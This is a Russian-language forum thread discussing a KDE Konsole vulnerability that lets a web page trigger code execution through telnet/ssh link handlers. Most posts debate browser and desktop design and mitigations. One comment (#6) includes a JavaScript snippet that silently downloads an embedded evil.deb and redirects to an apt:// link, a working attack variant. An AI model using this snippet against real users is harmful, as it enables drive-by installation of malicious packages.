The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в KDE Konsole, позволяющая выполнить код при открытии страницы в браузере"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в KDE Konsole, позволяющая выполнить код при открытии страницы в браузере"  +/
Сообщение от opennews (?), 15-Июн-25, 23:16 
В развиваемом проектом KDE эмуляторе терминала Konsole выявлена уязвимость (CVE-2025-49091), позволяющая организовать выполнение кода в системе при открытии в браузере специально оформленной страницы...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=63410

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

2. Сообщение от Аноним (2), 15-Июн-25, 23:19   +14 +/
У меня больше вопрос в другом. Зачем это вообще в браузере? Кто и на... запускает telnet и ssh через браузер?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4, #7, #8, #53, #59

3. Сообщение от 12yoexpert (ok), 15-Июн-25, 23:32   –10 +/
ну а что вы хотели от тимы, в которую вместо инженеров набрали эффективненьких самопиарщиков типа нэта грема
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #17

4. Сообщение от Аноним (4), 15-Июн-25, 23:37   +5 +/
Ты лучше спроси зачем в браузере URL ghelp:// :-) https://opennet.ru/63035-gnome
Хороши, что KDE, что GNOME, что дистрибутивы, регистрирующие кучу MIME-типов.

PS. В Firefox в about:preferences#general  в поле поиска набери Applications, там полно всего, включая irc и apt. Как насчёт провернуть подобную атаку для установки левого пакета через apt?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #6, #10, #40

5. Сообщение от oficsu (ok), 15-Июн-25, 23:40   +/
> в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil"

Который непременно должен откуда-то лежать у пользователя, быть баш-скриптом и непременно должен реализовывать желаемое злоумышленником поведение по умолчанию (без параметров, ибо их туда передать нельзя)?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #9

6. Сообщение от Аноним (4), 15-Июн-25, 23:45   +12 +/
Блин, а оно ведь сработало!

В Ubuntu Firefox и Chrome загружают автоматом deb-пакет, а потом выводят запрос типа "Allow this site to open the apt link with AptURL?"

Скрипт поправил так:

  function downloadAndRedirect() {
            const anchor = document.createElement('a');
            anchor.href = "data:;base64,содержимое deb-пакета в base64";
            anchor.download = 'evil.deb';
            document.body.appendChild(anchor);
            anchor.click();
            document.body.removeChild(anchor);
            
            setTimeout(() => {
             window.location.href = "apt:///proc/self/cwd/Downloads/evil.deb";
             }, 1000);
        }


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #66

7. Сообщение от jj (?), 15-Июн-25, 23:45   +1 +/
Давным давно запускал, очень удобно когда у тебя счет железок на тысячи, или по вашему хранить ip надо в txt или exel.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #89

8. Сообщение от oficsu (ok), 15-Июн-25, 23:47   +3 +/
Это всё стандартные uri-хендлеры, которые могут открываться не только из браузера. Лучшее, что нармальный браузер может сделать (и делает, естественно) — это спросить, хочет ли пользователь запускать соответствующий хендлер. Будь это tel://, magnet:// или ssh:// — это дело пользователя, что он хочет открывать, а не браузера

А ssh://, очевидно, является полезным обработчиком. Например, можно хотеть логиниться на сервер из менеджера паролей в один клик. И не важно, выступает ли этимм менеджером KeePassXC, какой-то вебапп на электроне или вообще корпоративная страничка в браузере с полным списком серверов и паролей. Пользователю нужно открыть ssh-доступ из приложения — он соглашется

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #16

9. Сообщение от Аноним (4), 15-Июн-25, 23:49   +5 +/
/proc/self/cwd/Downloads/evil ссылается на файл, который браузер автоматически без согласия пользователя может загрузить, в том и проблема, что по дефолту Firefox и Chrome без спроса грузят и во всплывающем уведомлении показывают, что загрузили.

Раньше нужно было, чтобы пользователь хотя бы кликул на ссылку для начала загрузки, а сейчас из JavaScript достаточно вызвать метод click();

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #11, #12

10. Сообщение от 12yoexpert (ok), 15-Июн-25, 23:52   +1 +/
> Ты лучше спроси зачем в браузере URL ghelp://

зачем тебе в браузере URL ghelp://?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

11. Сообщение от oficsu (ok), 15-Июн-25, 23:52   +2 +/
Спасибо, так действительно звучит намного опаснее
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

12. Сообщение от Аноним (12), 16-Июн-25, 00:17   +/
Справедливости ради, при открытии такой ссылки браузер предупреждает пользователя. Проверил сейчас на хромом и лисе.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

13. Сообщение от Аноним (13), 16-Июн-25, 00:29   +/
>В Firefox и Chrome при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя

И где уязвимость?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #15

14. Сообщение от Аноним (14), 16-Июн-25, 00:31   +1 +/
> удалить файл /usr/share/applications/ktelnetservice6.desktop

Если у вас подкроватный сервер, который перезагружается раз в год, то не забудьте что-то вроде:

$ sudo update-desktop-database

чтобы перестроить кеш обработчиков MIME типов

Ответить | Правка | Наверх | Cообщить модератору

15. Сообщение от oficsu (ok), 16-Июн-25, 03:17   +5 +/
В том месте, где браузером спрашивается подтверждение запуска telnet-обработчика, а Konsole вместо него запускает произвольный код
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13

16. Сообщение от Аноним (16), 16-Июн-25, 04:13   +/
Да зачем вообще нужны программы, пусть уже всё браузер делает. Браузера хватит всем...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #34, #55

17. Сообщение от Аноним (17), 16-Июн-25, 04:26   –9 +/
это не самопиар, а самообман - сообщество™ разработчиков кде по определению не может обеспечить качество на уровне корпоративного продукта

единственная надежда у поклонников проекта кде заключается в том, что Габен и ко. возьмут кодовую базу этой СРС под свой контроль, то есть под контроль программистов на зарплате

но зачем ждать, когда уже сейчас можно просто пользоваться GNOME? (:

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #33, #46, #99

33. Сообщение от МИСАКА (?), 16-Июн-25, 05:27   +4 +/
Сейчас бы пользоваться поделием, которое считает юзера за идиота и не может решить, хочет оно пародировать макось или иось
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #36

34. Сообщение от Аноним (34), 16-Июн-25, 05:30   +/
Всё есть урл.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16

35. Сообщение от bdrbt (ok), 16-Июн-25, 06:04   +2 +/
Это конечно полный аллес. Нооо в сравнении с современными "привычками" для установки некоторого софта вроде:

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

Особой дичью не кажется.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #58, #64, #91

36. Сообщение от Аноним (17), 16-Июн-25, 06:49   –2 +/
пользуюсь с удовольствием) а пародировать они могут хоть TempleOS, лишь бы удобно было работать
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33

37. Сообщение от Аноним (37), 16-Июн-25, 07:02   +/
У меня вопросы к автору подобных статей. По какой причине в ссылках вот в этом предложении:
"Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD."
по ссылкам на Fedora, Arch и FreeBSD какая-то муть?! Если с Debian, Ubuntu и остальными всё понятно, там хоть по теме ссылки порой прямые на статус работы с уязвимостью, то в той же Fedora общая ссылка ведущая на портянку списка обновлений и ещё поищи там конкретное сообщение по теме и не факт что найдёшь?! И такое безалаберное отношение к оформлению подобной новости я вижу не в первый раз. Вы хотя бы проверяете ссылки, которые предоставляете в тексте своей новости? По Fedora такая картина уже довольно давно, просто будто вы занимаетесь бездумной копипастой таких новостей с зарубежных сайтов не удосужевшись проверить что по ссылкам, вот зачем так делать?
По Арчу, не лучше картина кстати, там просто ссылка на пакет, никакого статус работы над уязвимостью в той ссылке нет, от слова СОВСЕМ!

Доколе такое безобразие будет продолжаться?!!11

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #47, #105

38. Сообщение от Аноним (38), 16-Июн-25, 08:19   –1 +/
Вот вам все прелести Яваскрипта. Вы рады?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #41, #57

39. Сообщение от maximnik0 (?), 16-Июн-25, 08:22   +/
Очень похоже на бэкдор.Т.к такая же уязвимость ещё 10 лет назад всплывала,так же устраняли .Неужели все комментарии с патчами потеряли и опять на те же грабли наступили- очень сомнительно.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #114

40. Сообщение от Аноним (40), 16-Июн-25, 08:23   +/
тор браузер посылает эти типы куда подальше. (можно пользоватся без тора если что)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

41. Сообщение от MikhailFF (ok), 16-Июн-25, 08:40   +2 +/
90-е закончились, яваскрипт победил. А ты все держишь оборону ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #43, #48, #76

42. Сообщение от Аноникл (?), 16-Июн-25, 08:40   +/
попробовал в фаерфоксе - вылез диалог сохранения файла. если нажать save то сохранится файл evil. Версия Konsole 25.04.2
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #51, #69

43. Сообщение от Аноникл (?), 16-Июн-25, 08:42   +/
облепленный сзади питонами
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

44. Сообщение от Аноним (44), 16-Июн-25, 09:17   +/
Этот бэкдор в какой версии появился? Кто автор комита?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #50, #87

45. Сообщение от name (??), 16-Июн-25, 09:28   +/
Это какой-то позор, господа. Баги уровня 80ых в 2025. Трудно поверить.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #73

46. Сообщение от nv (?), 16-Июн-25, 09:43   +1 +/
Смешно такое читать на фоне того, как nvidia с капитализацией 3трлн $ не в состоянии нормально написать и протестировать драйвера и свой основной софт. Или MS c капиталиецией 2трлн $ постоянно сокращают топовых инженеров и в разработке софта делают упор на добавление фич, а стабильность уходит на второй план.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #54, #60, #81, #90

47. Сообщение от Maxim Chirkov (ok), 16-Июн-25, 09:55   +/
В Fedora нет трекера исправления уязвимостей по CVE-идентификатору. Есть общий багтрекер со своими внутренними идентификаторами, но бывает в момент написания новости записей там ещё нет, поэтому для Fedora оптимальней давать ссылку на список для отслеживания появления новой версии пакета. В тексте новости до перечисления дистрибутивов всегда указывается в какую версию добавлено исправление.  В случае рассматриваемой уязвимости, в момент раскрытия информации о наличии уязвимости в Fedora уже был пакет konsole-25.04.2 и в багтрекере для него была только запись о новой сборке без упоминания исправления уязвимости - https://koji.fedoraproject.org/koji/buildinfo?buildID=2727830

В Arch Linux трекер по CVE есть, но записи об уязвимостях там часто появляются с опозданием, уже после выпуска новой версии программы в пакете. Поэтому может сложиться впечатление, что уязвимость ещё не устранена, хотя она уже исправлена.


Во FreeBSD информация в портах обновляется с запозданием и самое оптимальное отслеживать исправления через https://www.vuxml.org/freebsd/

Это лучше, чем просто писать, что на момент написания новости уязвимость ещё не исправлена  и, соответстенно, конкректную ссылку дать невозможно.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37 Ответы: #52, #68

48. Сообщение от Аноним (48), 16-Июн-25, 10:00   –3 +/
>А ты все держишь оборону ?

Да. И очень эффективно с помощью NoScript, uMatrix, etc.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

49. Сообщение от Аноним (49), 16-Июн-25, 10:14   –2 +/
КДЕ-шные мудрённые поделки, например в LXTerminal такая шляпа невозможна by design.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #56, #74, #107

50. Сообщение от Аноним (50), 16-Июн-25, 10:22   +/
Не удивлюсь, если эта уязвимость каждый мажорный релиз появляется и чинится, а то и не раз.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

51. Сообщение от Аноним (4), 16-Июн-25, 10:22   +/
Верните в настройках опцию "Always ask you where to save files" в значение по умолчанию и перестанет спрашивать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

52. Сообщение от Аноним (64), 16-Июн-25, 10:38   –1 +/
> Во FreeBSD информация в портах обновляется с запозданием и самое оптимальное отслеживать
> исправления через https://www.vuxml.org/freebsd/

Учитывая, что для фри придется сначала пропатчить КДЕ^W procfs (вместо /proc/self там /proc/curproc, а /proc/*/cwd нет от слова совсем), то отслеживать можно будет долго ...


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47 Ответы: #63

53. Сообщение от Аноним (55), 16-Июн-25, 10:44   +/
>Зачем это вообще в браузере?

Типичный сторонник жирных браузеров.

В браузере ничего нет - есть гиперссылка, с протоколом. Браузер передаёт эту ссылку в систему, система самостоятельно находит обработчик.
>Кто и на... запускает telnet и ssh через браузер?

Кдешнки. Не вечно же на гномеров бочку катить.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #97

54. Сообщение от serg (??), 16-Июн-25, 10:46   +1 +/
в копилку: скачайте и поставьте расширение в вбокс 7.1.10
Наркоманы на работе. Видимо теперь это норма.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

55. Сообщение от Аноним (55), 16-Июн-25, 10:46   +3 +/
>пусть уже всё браузер делает

Вам прямо сказали, что дело не в браузере, а вы опять бочку на браузер катите.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16

56. Сообщение от гг (?), 16-Июн-25, 10:48   +2 +/
Да, а еще в command.com
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49

57. Сообщение от Аноним (55), 16-Июн-25, 10:56   +2 +/
При чём тут яваскрипт? Какое отношение консоль имеет к браузеру?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38

58. Сообщение от Аноним (55), 16-Июн-25, 11:03   +/
Щито поделать, десу. Ну вот не хотят юзвери нормальный пакетный менеджер типа nix, хотят curl | sh
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35

59. Сообщение от User (??), 16-Июн-25, 11:07   +/
Ну вот на прошлом месте работы в cmdb урлики для подключения к линуксячьим нодам по ssh и вроде даже к виндовым по rdp (или там просто файлики? Не помню уже) автоматически генерились, всем нравилось. Нет, встречались любители руками в цонцоле колотить или там из файла "пороли.тхт" мышкой копировать - но это что-то постыдное было).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

60. Сообщение от User (??), 16-Июн-25, 11:31   +1 +/
Даже интересно, сколько из этой суммы они должны по вашему мнению потратить на реализацию хотелок 0 целых хрен десятых любителей nvidia лохматой версии на коре дуба от 0 хрен десятых любителей wayland'а на десктопе от аж целых 4х процентов пользователей? При том, что деньги они получают от крупных оем производителей (которым на эти хотелки тоже пофиг), а не от уаси-в-рассыпуху и вообще основной профит идёт не с этого рынка...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46 Ответы: #62

61. Сообщение от Аноним (61), 16-Июн-25, 12:09   +/
Я не специалист по телнет и ssh. Но нет ли случайно такой возможности, чтобы сформировать команду, мол подключайся к локалхосту без авторизации и запускай эти команды?
Ответить | Правка | Наверх | Cообщить модератору

62. Сообщение от Аноним (55), 16-Июн-25, 12:52   +/
Это системная проблема. Можно было бы сказать, что невидевские карточки для виндузятников, если бы у них не горели разъёмы. А так, им всё равно - разъём сгорит или под вейлендом работать не будет.

С виндой аналогично - качество винды падает, но виндузятников как всегда волнует только процент вейленда на десктопе линуксоидов.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60 Ответы: #71

63. Сообщение от Аноним (55), 16-Июн-25, 12:54   –1 +/
>вместо /proc/self там /proc/curproc

Фряха защищённее линукска на время произнесения фразы "ух ты, фряха!".
>а /proc/*/cwd нет от слова совсем

А что там есть?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #65

64. Сообщение от Аноним (64), 16-Июн-25, 13:13   +/
> Это конечно полный аллес. Нооо в сравнении с современными "привычками" для установки
> некоторого софта вроде:
> curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
> Особой дичью не кажется.

Учитывая, что оно даже в дебияне
https://packages.debian.org/trixie/rustup
не слишком окаменелой версии - опять в дурных "привычках" виноваты другие?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #72, #88

65. Сообщение от Аноним (64), 16-Июн-25, 13:20   +/
>>вместо /proc/self там /proc/curproc
> Фряха защищённее линукска на время произнесения фразы "ух ты, фряха!".

Конкретна эта уязвимость -- не затрагивает фрю не только "на время произнесения". Причем, вне зависимости от причин твоего припекания ...

>>а /proc/*/cwd нет от слова совсем
> А что там есть?

https://man.freebsd.org/cgi/man.cgi?query=procfs


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #82, #120

66. Сообщение от Аноним (66), 16-Июн-25, 13:26   +/
Но оно же не устанавливает пакет автоматом при открытии ссылки, а показывает окно с инфой о пакете и опцией его установить? Так для этого достаточно просто http-ссылки на deb-пакет без фокусов с перенаправлением на "apt://", стандартное скачать и открыть файл.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #122

67. Сообщение от Аноним (67), 16-Июн-25, 13:51    Скрыто ботом-модератором–1 +/
Ответить | Правка | Наверх | Cообщить модератору

68. Сообщение от Аноним (37), 16-Июн-25, 13:54   +/
> В Fedora нет трекера исправления уязвимостей по CVE-идентификатору. Есть общий багтрекер
> со своими внутренними идентификаторами, но бывает в момент написания новости записей
> там ещё нет, поэтому для Fedora оптимальней давать ссылку на список
> для отслеживания появления новой версии пакета. В тексте новости до перечисления
> дистрибутивов всегда указывается в какую версию добавлено исправление.  В случае
> рассматриваемой уязвимости, в момент раскрытия информации о наличии уязвимости в Fedora
> уже был пакет konsole-25.04.2 и в багтрекере для него была только
> запись о новой сборке без упоминания исправления уязвимости - https://koji.fedoraproject.org/koji/buildinfo?buildID=2727830

Спасибо за разъяснения! Но всё же, почему не дать пояснение в новости, что вот ссылка на пакет Fedora в котором уже уязвимость устранена? Если ещё не устранена, то давать прямую ссылку на уязвимую версию, это на мой взгляд лучше, чем просто посылать на общую страницу.
Вот хотя бы даже и эту вашу ссылку можно было оставить с пояснениями, которые вы дали.

> В Arch Linux трекер по CVE есть, но записи об уязвимостях там
> часто появляются с опозданием, уже после выпуска новой версии программы в
> пакете. Поэтому может сложиться впечатление, что уязвимость ещё не устранена, хотя
> она уже исправлена.

Так всё правильно, CVE текер есть, но ссылка зачем-то на пакет, вопрос зачем, чтобы что-то запостить? Можно было опять же сделать такую ссылку отдельно от того предложения с пояснением ситуации.

Понимаете ли, вопрос не в том, насколько актуальна информация в новости на данный момент в каком-то дистрибутиве, вопрос в том, что автор статьи вводит в заблуждение фразой: "Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD.", а часть ссылок при этом не относится к утверждению проследить за устраниениея уязвимости в дистрибутивах можно на слудущих страницах, от слова НИКАК, т.е. ожидание и реальность расходятся. Запросто можно было не вводить в заблуждение, а оставить только те ссылки в предложении, которые явно видут на информацию о статусе работы с уязвимыми пакетами, а остальные ссылки привести в более приближённом виде отдельно, с пояснениями почему они в таком виде, а не сгружать в кучу с остальными добротными ссылками, которые по факту и указывают на то, о чём утверждается в предложении.

> Во FreeBSD информация в портах обновляется с запозданием и самое оптимальное отслеживать
> исправления через https://www.vuxml.org/freebsd/
> Это лучше, чем просто писать, что на момент написания новости уязвимость ещё
> не исправлена  и, соответстенно, конкректную ссылку дать невозможно.

Нет, я считаю, что не лучше, потому что в таком виде: "Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD." - это просто введение в заблуждение, т.к. по ссылкам не то что заявлено в предложении.
Это как если бы вы пошли в магазин, купили там пакет набора конфет ассорти в непрозрачной коробке, понадеялись на описание, что там конфеты от 6ти разных фабрик, шоколадные все с разной начинкой. А в итоге открыли, а там три вида конфет нормальные, как заявлено, а три остальные какая с другой начинкой, а какая вообще пустая оболочка, потому что формирующий пакет упаковщик не положил их, т.к. поставщик не успел, но на упаковке написано, что вот в ней лежат шесть разных шоколадных конфет от шести разных фабрик с разными вкусными начинками. Надеюсь аналогия понятна?! ))

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47 Ответы: #70

69. Сообщение от Аноним (37), 16-Июн-25, 14:00   +/
> попробовал в фаерфоксе - вылез диалог сохранения файла. если нажать save то
> сохранится файл evil. Версия Konsole 25.04.2

Так там же в статье явно написано, что "Эксплуатации уязвимостей сопутствует то, что в конфигурации по умолчанию современные версии Firefox и Chrome автоматически сохраняют инициированные для загрузки файлы" т.е. русским по бежевому написано, что в КОНФИГУРАЦИИ ПО УМОЛЧАНИЮ, а по умолчанию они не спрашивают. Если у вас какие-то свои настройки, то вы - молодец и хороший мальчик, гордитесь собой, возьмите с полки пирожок!.. Хотя нет, не молодец, т.к. с внимательностью у вас беда, так что верните пирожок обратно!

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

70. Сообщение от Maxim Chirkov (ok), 16-Июн-25, 14:16   +/
> Спасибо за разъяснения! Но всё же, почему не дать пояснение в новости, что вот ссылка на пакет Fedora в котором уже уязвимость устранена?

Ok, по возможности буду ставить ссылку на багтрекер или сам пакет, если в трекере информация ещё не заведена.

> Если ещё не устранена, то давать прямую ссылку на уязвимую версию

В этом случае разработчики могут через 5 минут выпустить обновление, а в новости будет про то, что уязвимость ещё не исправлена. Информация меняется очень бысто, на момент написания новости одна ситуация, а на момент её прочтения посетителями может быть уже другой. Тогда уж ставить ссыку на состояние пакета и предлагать проверить версию. Но здесь тоже есть нюансы, по хорошему нужна информация с экспертизой от самого дистрибутива, так как по номеру версии уязвимость может казаться  что есть, а по факту в пакете может быть какой-то свой патч, изменение или особые настройки, при которых уязвимость не проявляется.


> Так всё правильно, CVE текер есть, но ссылка зачем-то на пакет, вопрос зачем, чтобы что-то запостить?

В Arch стал ставить ссылки на пакет по просбе посетителей, так как CVE-страница бывает не отражает фактическое состояние, то по номеру версии проще понять, вышло обновление или нет.


> Нет, я считаю, что не лучше, потому что в таком виде: "Проследить за устранением
> уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD." -
> это просто введение в заблуждение, т.к. по ссылкам не то что заявлено в предложении.

Ну почему же, проверить номер версии в пакете, зная в какой версии уязвимость устранена, вполне себе "Проследить за устранением уязвимости". Могу заменить на "Проверить состояние версии или подготовки исправления..." для большей точности.



Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68 Ответы: #98

71. Сообщение от User (??), 16-Июн-25, 14:19   +/
С тем, что в индустрии есть системная проблема, связанная с нелинейным характером зависимости сложности системы от размера кодовой базы в общем-то никто и не спорит.

Вопрос в том, сколько на решение частного случая проблемы 1,5% пользователей должна потратить компания, с учетом того, что эти 1,5% будут еще и "немножко вредить" своим штабле нонсенсом, ага.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62 Ответы: #108

72. Сообщение от Аноним (72), 16-Июн-25, 14:23   +/
> не слишком окаменелой версии

тот дебиян еще не слишком релизнулся

> опять в дурных "привычках" виноваты другие?

ну таки на сайте раста так первым же делом написано, а они небезопасного не посоветуют и не сделают

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #115

73. Сообщение от Аноним (73), 16-Июн-25, 14:49   +/
Просто кодеры не понимаю что все остальные не обязательно занимаются Компьютерами.
Когда они это поймут они будут делать для людей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45 Ответы: #93

74. Сообщение от Аноним (73), 16-Июн-25, 14:50   +/
> КДЕ-шные мудрённые поделки, например в LXTerminal такая шляпа невозможна by design.

Чем более это сложное, тем прощще это ломается.
Тем больше там ошибок. Глюков.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #80

76. Сообщение от Аноним (-), 16-Июн-25, 16:48   +/
Может ему VB скрипт больше нравится))
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

77. Сообщение от myster (ok), 16-Июн-25, 17:15   –1 +/
Это уязвимость в веб-браузере тоже.
Вместо вопроса: "Allow this site to open the telnet link with KTelnetService?"
Веб-браузеры должны явно отображать команду, которую запускают: "Запускаю /usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil, вы согласны?"

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #86

80. Сообщение от Афроним (?), 16-Июн-25, 17:59   +/
Терминал Лхде проще чем кедовая консолька?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74 Ответы: #85, #109

81. Сообщение от Аноним (-), 16-Июн-25, 18:02   +/
> nvidia с капитализацией 3трлн $ не в состоянии нормально написать
> и протестировать драйвера и свой основной софт

Вот как раз потому что они не тратять время на всяких четырепроцентников - у них капитализация 3трлн$. Потому что нужно приавильно расставлять приоритеты.

> а стабильность уходит на второй план.

А им не нужна стабильность. Им нужно быть стабильнее чем конкуренты.
И пока они обгоняют дестопный линь с огромным отрывом)))

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

82. Сообщение от Ананимаз (?), 16-Июн-25, 18:37   +/
эта прокфс еще и не смонтирована по-умолчанию

впрочем проблемы в целом это не отменяет

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #65

83. Сообщение от Syndrome (ok), 16-Июн-25, 18:52   +1 +/
Сомнительную функцию можно отключить в файрфоксе через настройку
network.protocol-handler.external-default = false
Ответить | Правка | Наверх | Cообщить модератору

84. Сообщение от Аноним (85), 16-Июн-25, 19:36   +/
Ещё одно подтвержение того, что кедо поклонникам надо юзать дубовое и безбэкдорное LXQt, ведь там нет всяких свистопрделок, а значит и CVE меньше в десятки раз!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #100

85. Сообщение от Аноним (85), 16-Июн-25, 19:52   +1 +/
Конечно проще.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

86. Сообщение от Аноним (55), 16-Июн-25, 20:56   –1 +/
Ещё один воен с браузерами.
>Запускаю /usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil, вы согласны?

Вам же в новости сказано, что команду запускает konsole а не браузер. Браузер лишь передаёт аргумент konsole, и ему совершенно не известно, как этот konsole этот код перекрутит. И будет там что-то вроде
konsole 'telnet:///proc/self/cwd/Downloads/evil'
Откуда браузеру знать, во что раскроется эта команда?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #77 Ответы: #102, #103

87. Сообщение от Аноним (55), 16-Июн-25, 20:58   +/
git blame изобретён
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

88. Сообщение от Аноним (55), 16-Июн-25, 21:00   +/
Оно есть только в нерелизнувшемся trixie. В стабильных релизах - нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64

89. Сообщение от Аноним (89), 16-Июн-25, 21:06   –1 +/
> удобно когда у тебя счет железок на тысячи

Так как раз же неудобно. Когда счёт идёт даже на десятки, уже неудобно вручную админить, а ты тут про тысячи заливаешь. Автоматизация — слыхал про такое? Пушишь в гит что нужно, а дальше оно само.

> или по вашему хранить ip надо в txt или exel.

IP надо хранить в DNS, и иметь схему которая позволяет зная где сервер скрафтить его доменное имя. Это если тебе надо куда-то конкретно попасть. А для IPAM надо специализированный софт использовать, да хоть тот же NetBox. Если только у тебя не один /23 или что-то такое же смешное. С таким действительно проще CSV или эксельку, котрые уже читать скриптом и генерить имена устройствам.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7

90. Сообщение от Аноним (89), 16-Июн-25, 21:10   +/
> постоянно сокращают топовых инженеров

Топовых как раз не сокращают, инфа сотка. Под нож идёт балласт. Почему такая происходит очевидно. И нет, не потому что эффектиные менеджеры.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

91. Сообщение от Аноним (89), 16-Июн-25, 21:12   –1 +/
И ты сейчас нам конечно же расскажешь, почему это плохо и опасно, а sudo apt install -y blah-blah-blah — хорошо и безопасно, да?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #94, #95

92. Сообщение от Аноним (92), 16-Июн-25, 21:13   +/
touch /usr/local/bin/telnet
touch /usr/local/bin/rlogin

Ответить | Правка | Наверх | Cообщить модератору

93. Сообщение от Аноним (89), 16-Июн-25, 21:16   +/
> Когда они это поймут они будут делать для людей.

Не поймут никогда. Пока менеджер не объяснит. Таков путь.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #73

94. Сообщение от bdrbt (ok), 16-Июн-25, 21:23   +2 +/
С чексуммами, патчами и конкретной версией, против стягивания хер пойми чего и откуда из интернетов с безоглядным запуском в шелл.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #91 Ответы: #110

95. Сообщение от bdrbt (ok), 16-Июн-25, 21:25   +2 +/
> И ты сейчас нам конечно же расскажешь, почему это плохо и опасно, а sudo apt install -y blah-blah-blah — хорошо и безопасно, да?

Если тебе об этом надо говорить - тебе бесполезно об этом говорить.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #91

96. Сообщение от Аноним (99), 16-Июн-25, 21:42   +/
"Always ask you where to save files" это одна из первых настроек, что я делаю в любом браузере.
Ответить | Правка | Наверх | Cообщить модератору

97. Сообщение от Аноним (97), 16-Июн-25, 21:43   +/
>Браузер передаёт эту ссылку в систему, система самостоятельно находит обработчик.

Браузер недолжен делать НИЧЕГО. Не поддерживается схема браузером - игнор, и не надо ничего открывать. Юзер сам допрёт, что со схемой ssh:// делать.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53 Ответы: #116

